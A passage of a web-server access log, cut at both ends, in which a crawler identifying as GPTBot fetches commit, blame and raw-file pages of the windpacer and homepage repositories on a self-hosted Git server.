"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" +[17/Feb/2026:13:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" +[17/Feb/2026:13:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" +[17/Feb/2026:13:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10982] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" [Client 74.7.227.38] [Length 22468] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" +[17/Feb/2026:13:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" +[17/Feb/2026:13:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" +[17/Feb/2026:13:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" +[17/Feb/2026:13:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" +[17/Feb/2026:13:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" +[17/Feb/2026:13:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" +[17/Feb/2026:13:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" +[17/Feb/2026:13:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" +[17/Feb/2026:13:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" +[17/Feb/2026:13:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 1752074] [Gzip 24.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10912] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:13:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" +[17/Feb/2026:13:13:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:13:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" [Client 74.7.227.38] [Length 11653] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:13:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" +[17/Feb/2026:13:13:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" +[17/Feb/2026:13:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 15233] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.patch" [Client 74.7.227.38] [Length 663] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata" [Client 74.7.227.38] [Length 52984] [Gzip 10.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" [Client 74.7.227.38] [Length 11034] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" +[17/Feb/2026:13:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 28975] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009046] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10164] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" [Client 74.7.227.38] [Length 19731] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" +[17/Feb/2026:13:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" [Client 74.7.227.38] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" +[17/Feb/2026:13:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" +[17/Feb/2026:13:14:00 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" +[17/Feb/2026:13:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 7499] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 28979] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" [Client 74.7.227.38] [Length 10292] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:13:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:13:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 30211] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 74.7.227.38] [Length 14651] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" +[17/Feb/2026:13:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 74.7.227.38] [Length 15505] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" +[17/Feb/2026:13:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" +[17/Feb/2026:13:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" +[17/Feb/2026:13:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" +[17/Feb/2026:13:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" +[17/Feb/2026:13:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" +[17/Feb/2026:13:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" [Client 74.7.227.38] [Length 10954] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" +[17/Feb/2026:13:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" [Client 74.7.227.38] [Length 10757] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" +[17/Feb/2026:13:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata" [Client 74.7.227.38] [Length 23397] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" +[17/Feb/2026:13:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 74.7.227.38] [Length 7499] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr 